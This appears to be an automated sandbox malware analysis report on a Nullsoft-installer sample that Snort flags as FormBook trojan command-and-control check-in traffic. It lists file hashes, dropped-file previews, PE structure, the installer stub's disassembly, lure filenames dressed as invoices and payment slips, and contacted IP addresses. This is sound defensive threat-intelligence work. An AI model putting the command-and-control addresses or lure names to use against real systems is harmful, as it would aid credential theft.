• EASTWAY COMNAGA SB PAYMENT BANK IN SLIP 250521_PDF.exe | malicious | 192.253.242.6
• de725d13_by_Libranalysis.exe | malicious | 50.23.197.95
• $RAULIU9.exe | malicious | 198.252.103.41
• Receipt565647864.html | malicious | 158.177.118.97
• 350969bc_by_Libranalysis.exe | malicious | 119.81.45.82
• Open_Invoice_and_statements.htm | malicious | 158.176.79.200
• 2x93jpW0Ac.dmg | malicious | 108.168.175.167
• 4wHhXGk3b9.dmg | malicious | 108.168.175.167
• networkservice.exe | malicious | 69.56.135.212
• 6544THReceipt56GFHD.html | malicious | 158.177.118.97

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll
• 8qdfmqz1PN.exe (Detection: malicious)
• New Order PO2193570O1.doc (Detection: malicious)
• L2.xlsx (Detection: malicious)
• Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx (Detection: malicious)
• New Order PO2193570O1.pdf.exe (Detection: malicious)
• 2320900000000.exe (Detection: malicious)
• CshpH9OSkc.exe (Detection: malicious)
• 5SXTKXCnqS.exe (Detection: malicious)
• i6xFULh8J5.exe (Detection: malicious)
• AWB00028487364 -000487449287.doc (Detection: malicious)
• 090049000009000.exe (Detection: malicious)
• dYy3yfSkwY.exe (Detection: malicious)
• PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx (Detection: malicious)
• Purchase Order Price List 061021.xlsx (Detection: malicious)
• Proforma Invoice and Bank swift-REG.PI-0086547654.exe (Detection: malicious)
• UGGJ4NnzFz.exe (Detection: malicious)
• Proforma Invoice and Bank swift-REG.PI-0086547654.exe (Detection: malicious)
• 3arZKnr21W.exe (Detection: malicious)
• Shipping receipt.exe (Detection: malicious)
• New Order TL273723734533.pdf.exe (Detection: malicious)

Created / dropped Files

C:\Users\user\AppData\Local\Temp\liw53s6e5g55t9
Process: C:\Users\user\Desktop\5t2CmTUhKc.exe
File Type: data
Category: dropped
Size (bytes): 164864
Entropy (8bit): 7.998820292327425
Encrypted: true
SSDEEP: 3072:Qqr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4S:drlEXrPB2EtLTvbh21eq4S
MD5: 68A3F57B8B343B5F9BF05C9F35A086A3
SHA1: 29015249F259A9AAF76D3AD6774019CFBBD118FD
SHA-256: D2D0C6EC98898B2B21BE258090B267AA98A5C4FEA808B37DC7BBAF38B900246F
SHA-512: 36538D7036BB092DC2E126387DAE328FB68EA53D3D7F8F3126AA986117EC569B32F11EC925192F75C1C7FA225BAF1C4BA88551F1AAF860444139E4A8ECC68B33
Malicious: false
Reputation: low
                                                                                                          Preview: Q.Uc5.0..@..C6.,.(.../7...1.H]..$9.p.].#.|......?.2.e.$..3p....:.Dt .<...[...=.kJ.p(|Y.#I:Eq.....T...!);A......u.t.....*....IZo..z..2..S...h.pu.&.?.]....U.@9*.V.:.......d.-..........C..I.8...8nZ..k.....jRY..../.P.....a...h..\.{gv.m22........r..8g....A..<....I.N.L..LB+.A.|..9........l.L..'...>aQ6..K.|.^P..%.Hu.{.....c^.....r..>.X.j6+/.1..E#m../.x....h..<.#.p.G...!..p.~.H.SL..%...j.Cg.}V....p....:..z.-H.....%57`.._I..........l.....,x .jU....<.h-6L..."-yy...X.KA.$YT......z.$].R..>..M@q.)...6F.v27|l.4.@b!.h.I6{@.%..aP.~..HcX..%.<.h../.A....;.....:..X.Na....A.s,:..&..F..q..'.r.(!,..p.^..+.......F..%.?..>......c.e........Y......A@}....Ke..W{j.^?.xnD.I.g......,.....`...b.....yu.6.]....ud.U.z.1.?@-..6u.-.`..K*..$.T9J..bo....K.WA ....,:.Sd[Iz#.txD..)...v.....}.....]..4L.....^...:B....4|..sM..Q..2....mK...>.D~....+8[?.=.9..X!r.4.......~..c.!d}...hR&ee.`..... ......d....G..G...k..}...._#G..O..{....hw....s23p....-v.5...p.......,...F.^W....T..P".
C:\Users\user\AppData\Local\Temp\nse5FE9.tmp
Process: C:\Users\user\Desktop\5t2CmTUhKc.exe
File Type: data
Category: dropped
Size (bytes): 261211
Entropy (8bit): 7.359115600393562
Encrypted: false
SSDEEP: 3072:7Sa/qr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4l20fjumGLPNt:WaSrlEXrPB2EtLTvbh21eq4V7LGLFt
MD5: AB8B0B65B223CDF58819B06790B548E2
SHA1: 0B678EAD9F82893461CC99EF27BEF78A3F3115F8
SHA-256: 205ACFB8E6DCF7203E2CE11F386D70851ABA48F2D7FF011A0B750E8092F94D29
SHA-512: FA39DFB9E056C2EFFB8C1F28339C9A7487C3239E2042E8DFE7ECD87FC510A32824B1A5AADF98BFA57B3039736AB8317241453FB6BB6DAAE7208FC64A685125CB
Malicious: false
Reputation: low
                                                                                                          Preview: .m......,.......................LP......$l.......l..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll
Process: C:\Users\user\Desktop\5t2CmTUhKc.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.855045165595541
Encrypted: false
SSDEEP: 192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5: FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1: 30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256: 6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512: F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 8qdfmqz1PN.exe, Detection: malicious
• Filename: New Order PO2193570O1.doc, Detection: malicious
• Filename: L2.xlsx, Detection: malicious
• Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious
• Filename: New Order PO2193570O1.pdf.exe, Detection: malicious
• Filename: 2320900000000.exe, Detection: malicious
• Filename: CshpH9OSkc.exe, Detection: malicious
• Filename: 5SXTKXCnqS.exe, Detection: malicious
• Filename: i6xFULh8J5.exe, Detection: malicious
• Filename: AWB00028487364 -000487449287.doc, Detection: malicious
• Filename: 090049000009000.exe, Detection: malicious
• Filename: dYy3yfSkwY.exe, Detection: malicious
• Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious
• Filename: Purchase Order Price List 061021.xlsx, Detection: malicious
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
• Filename: UGGJ4NnzFz.exe, Detection: malicious
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
• Filename: 3arZKnr21W.exe, Detection: malicious
• Filename: Shipping receipt.exe, Detection: malicious
• Filename: New Order TL273723734533.pdf.exe, Detection: malicious
Reputation: moderate, very likely benign file
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\xpwbfoj
Process: C:\Users\user\Desktop\5t2CmTUhKc.exe
File Type: data
Category: dropped
Size (bytes): 56641
Entropy (8bit): 4.976767365562505
Encrypted: false
SSDEEP: 768:Y3DnyBc/8CaRs3+Z06O2vxZODPqSjlr7GBOEEjHzYtfgcBGUePl72zvHzUfysnp3:i4opae+Z0z0wr7G3EjT8cd72DUpGLu
MD5: 92B8B4963350C3A198E9513D086FBB3C
SHA1: 8B365235930D9864D7CA3D3A8B67E61D314EA560
SHA-256: 7CE31FC69C94A1917273EB7BF938EFB0BA57EDA5281E20BE8EF13E7D8BA302F9
SHA-512: 75C83B2DCE7EB57B059FA4C9C50A7F308CD2521868EB83011F15C51E96489C15E987D72B0907BF59698924140306D6348578BF114CABB0A0C1A86FC033FE02C1
Malicious: false
Reputation: low
                                                                                                          Preview: U...........D.....E...B.F.....G.....H.....I.....J...?.K.....L.....M...v.N.....O.....P.....Q...?.R.....S...5.T.....U...p.V.....W.....X.....Y...7.Z.....[...P.\.....]...{.^....._...|.`.....a.....b.....c.....d...A.e.....f.....g...=.h.....i...T.j...7.k...1.l...|.m.....n...(.o.....p...?.q.....r...T.s...z.t.....u.....v...?.w.....x...T.y.....z...=.{.....|...T.}...?.~.........|...........=...........|.................{...........t.............................A.....9.............................=...........x.....7.....1.....t...........(...........?...........x.....z.................?...........x...........=...........x.....?...........t...........=...........t.................{...........l.............................A.....9.............................=...........p.....7.....1.....l...........(...........?...........p.....z.................?...........p

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.913752075626111
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 5t2CmTUhKc.exe
File size: 225177
MD5: 116e736ba00fca4b8499c4df00796454
SHA1: a8d3d62db4bd49e24c2bda3d0d81c3be25a81dae
SHA256: 096ca35528ef4f702e93f5f17d7954f26fb48acd4526794ce1ee99d27cf1a4c3
SHA512: 02ddab82dd68faa0627c15320de3e0b118b1cc95fee80fc013e57ed773a9420af5b23f3bb7f9ccac216c88581b665db29bd1ca5e03f7e0b52f9c542d75b57f78
SSDEEP: 3072:DQIURTXJ+MwMy2ZeD0EUquupJDoeGgFq+HAgDtI7LXZ2sQYvvlIieO82WbyXVvE4:Ds9wMReDph9AOI7LXosQQBBFsuyQUvnk
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x40323c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007FD84476DCAEh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007FD84476D961h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007FD84476D94Fh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007FD84476B0ACh
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007FD84476D442h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FD84476B105h
cmp cl, 00000020h
jne 00007FD84476B0A8h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FD84476B09Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.4453125 | data | 5.18162709925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.51012867721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-08:55:04.602555 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
06/11/21-08:55:05.651055 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
06/11/21-08:55:07.699033 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
06/11/21-08:55:14.730818 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.6 | 185.224.138.83
06/11/21-08:55:14.730818 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.6 | 185.224.138.83
06/11/21-08:55:14.730818 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.6 | 185.224.138.83

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 08:55:08.907310009 CEST | 49747 | 80 | 192.168.2.6 | 154.215.150.183
Jun 11, 2021 08:55:09.183316946 CEST | 80 | 49747 | 154.215.150.183 | 192.168.2.6
Jun 11, 2021 08:55:09.183506966 CEST | 49747 | 80 | 192.168.2.6 | 154.215.150.183
Jun 11, 2021 08:55:09.183716059 CEST | 49747 | 80 | 192.168.2.6 | 154.215.150.183
Jun 11, 2021 08:55:09.459450006 CEST | 80 | 49747 | 154.215.150.183 | 192.168.2.6
Jun 11, 2021 08:55:09.463644028 CEST | 80 | 49747 | 154.215.150.183 | 192.168.2.6
Jun 11, 2021 08:55:09.463757038 CEST | 80 | 49747 | 154.215.150.183 | 192.168.2.6
Jun 11, 2021 08:55:09.463888884 CEST | 49747 | 80 | 192.168.2.6 | 154.215.150.183
Jun 11, 2021 08:55:09.463996887 CEST | 49747 | 80 | 192.168.2.6 | 154.215.150.183
Jun 11, 2021 08:55:09.738563061 CEST | 80 | 49747 | 154.215.150.183 | 192.168.2.6
Jun 11, 2021 08:55:14.680730104 CEST | 49748 | 80 | 192.168.2.6 | 185.224.138.83
Jun 11, 2021 08:55:14.730499983 CEST | 80 | 49748 | 185.224.138.83 | 192.168.2.6
Jun 11, 2021 08:55:14.730671883 CEST | 49748 | 80 | 192.168.2.6 | 185.224.138.83
Jun 11, 2021 08:55:14.730818033 CEST | 49748 | 80 | 192.168.2.6 | 185.224.138.83
Jun 11, 2021 08:55:14.780528069 CEST | 80 | 49748 | 185.224.138.83 | 192.168.2.6
Jun 11, 2021 08:55:14.783538103 CEST | 80 | 49748 | 185.224.138.83 | 192.168.2.6
Jun 11, 2021 08:55:14.783576965 CEST | 80 | 49748 | 185.224.138.83 | 192.168.2.6
Jun 11, 2021 08:55:14.783593893 CEST | 80 | 49748 | 185.224.138.83 | 192.168.2.6
Jun 11, 2021 08:55:14.783745050 CEST | 49748 | 80 | 192.168.2.6 | 185.224.138.83
Jun 11, 2021 08:55:14.783894062 CEST | 49748 | 80 | 192.168.2.6 | 185.224.138.83
Jun 11, 2021 08:55:14.784004927 CEST | 80 | 49748 | 185.224.138.83 | 192.168.2.6
Jun 11, 2021 08:55:14.784123898 CEST | 49748 | 80 | 192.168.2.6 | 185.224.138.83
Jun 11, 2021 08:55:14.833467007 CEST | 80 | 49748 | 185.224.138.83 | 192.168.2.6
Jun 11, 2021 08:55:20.106741905 CEST | 49751 | 80 | 192.168.2.6 | 119.81.95.146
Jun 11, 2021 08:55:20.305175066 CEST | 80 | 49751 | 119.81.95.146 | 192.168.2.6
Jun 11, 2021 08:55:20.305429935 CEST | 49751 | 80 | 192.168.2.6 | 119.81.95.146
Jun 11, 2021 08:55:20.305771112 CEST | 49751 | 80 | 192.168.2.6 | 119.81.95.146
Jun 11, 2021 08:55:20.504008055 CEST | 80 | 49751 | 119.81.95.146 | 192.168.2.6
Jun 11, 2021 08:55:20.505008936 CEST | 80 | 49751 | 119.81.95.146 | 192.168.2.6
Jun 11, 2021 08:55:20.505048037 CEST | 80 | 49751 | 119.81.95.146 | 192.168.2.6
Jun 11, 2021 08:55:20.505301952 CEST | 49751 | 80 | 192.168.2.6 | 119.81.95.146
Jun 11, 2021 08:55:20.505383015 CEST | 49751 | 80 | 192.168.2.6 | 119.81.95.146
Jun 11, 2021 08:55:20.703990936 CEST | 80 | 49751 | 119.81.95.146 | 192.168.2.6
Jun 11, 2021 08:55:25.699980974 CEST | 49752 | 80 | 192.168.2.6 | 184.175.83.64
Jun 11, 2021 08:55:25.861229897 CEST | 80 | 49752 | 184.175.83.64 | 192.168.2.6
Jun 11, 2021 08:55:25.861443043 CEST | 49752 | 80 | 192.168.2.6 | 184.175.83.64
Jun 11, 2021 08:55:25.861802101 CEST | 49752 | 80 | 192.168.2.6 | 184.175.83.64
Jun 11, 2021 08:55:26.023224115 CEST | 80 | 49752 | 184.175.83.64 | 192.168.2.6
Jun 11, 2021 08:55:26.352801085 CEST | 49752 | 80 | 192.168.2.6 | 184.175.83.64
Jun 11, 2021 08:55:26.555392981 CEST | 80 | 49752 | 184.175.83.64 | 192.168.2.6
Jun 11, 2021 08:55:27.224795103 CEST | 80 | 49752 | 184.175.83.64 | 192.168.2.6
Jun 11, 2021 08:55:27.224836111 CEST | 80 | 49752 | 184.175.83.64 | 192.168.2.6
Jun 11, 2021 08:55:27.225110054 CEST | 49752 | 80 | 192.168.2.6 | 184.175.83.64
Jun 11, 2021 08:55:27.225182056 CEST | 49752 | 80 | 192.168.2.6 | 184.175.83.64
Jun 11, 2021 08:55:31.713376045 CEST | 49753 | 80 | 192.168.2.6 | 150.95.255.38
Jun 11, 2021 08:55:32.020508051 CEST | 80 | 49753 | 150.95.255.38 | 192.168.2.6
Jun 11, 2021 08:55:32.020761967 CEST | 49753 | 80 | 192.168.2.6 | 150.95.255.38
Jun 11, 2021 08:55:32.021022081 CEST | 49753 | 80 | 192.168.2.6 | 150.95.255.38
Jun 11, 2021 08:55:32.327981949 CEST | 80 | 49753 | 150.95.255.38 | 192.168.2.6
Jun 11, 2021 08:55:32.328037977 CEST | 80 | 49753 | 150.95.255.38 | 192.168.2.6
Jun 11, 2021 08:55:32.328058958 CEST | 80 | 49753 | 150.95.255.38 | 192.168.2.6
Jun 11, 2021 08:55:32.328315020 CEST | 49753 | 80 | 192.168.2.6 | 150.95.255.38
Jun 11, 2021 08:55:32.328356981 CEST | 49753 | 80 | 192.168.2.6 | 150.95.255.38
Jun 11, 2021 08:55:32.635231972 CEST | 80 | 49753 | 150.95.255.38 | 192.168.2.6
Jun 11, 2021 08:55:37.425743103 CEST | 49754 | 80 | 192.168.2.6 | 184.168.131.241
Jun 11, 2021 08:55:37.621603012 CEST | 80 | 49754 | 184.168.131.241 | 192.168.2.6
Jun 11, 2021 08:55:37.621725082 CEST | 49754 | 80 | 192.168.2.6 | 184.168.131.241
Jun 11, 2021 08:55:37.621895075 CEST | 49754 | 80 | 192.168.2.6 | 184.168.131.241
Jun 11, 2021 08:55:37.815676928 CEST | 80 | 49754 | 184.168.131.241 | 192.168.2.6
Jun 11, 2021 08:55:37.868011951 CEST | 80 | 49754 | 184.168.131.241 | 192.168.2.6
Jun 11, 2021 08:55:37.868060112 CEST | 80 | 49754 | 184.168.131.241 | 192.168.2.6
Jun 11, 2021 08:55:37.868515968 CEST | 49754 | 80 | 192.168.2.6 | 184.168.131.241
Jun 11, 2021 08:55:37.868659019 CEST | 49754 | 80 | 192.168.2.6 | 184.168.131.241
Jun 11, 2021 08:55:38.063754082 CEST | 80 | 49754 | 184.168.131.241 | 192.168.2.6

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 08:53:28.748171091 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:28.772994041 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:28.798204899 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:28.831573009 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:29.575366974 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:29.625926971 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:29.912538052 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:29.971339941 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:31.241482973 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:31.291564941 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:32.226155996 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:32.286700964 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:33.765980959 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:33.817195892 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:34.567260027 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:34.619024992 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:35.625138044 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:35.678283930 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:37.415075064 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:37.465636015 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:38.450017929 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:38.508734941 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:39.420214891 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:39.470349073 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:41.324762106 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:41.375246048 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:42.792856932 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:42.857922077 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:44.083930016 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:44.135401011 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:45.115511894 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Jun 11, 2021 08:53:45.169118881 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Jun 11, 2021 08:53:45.917996883 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
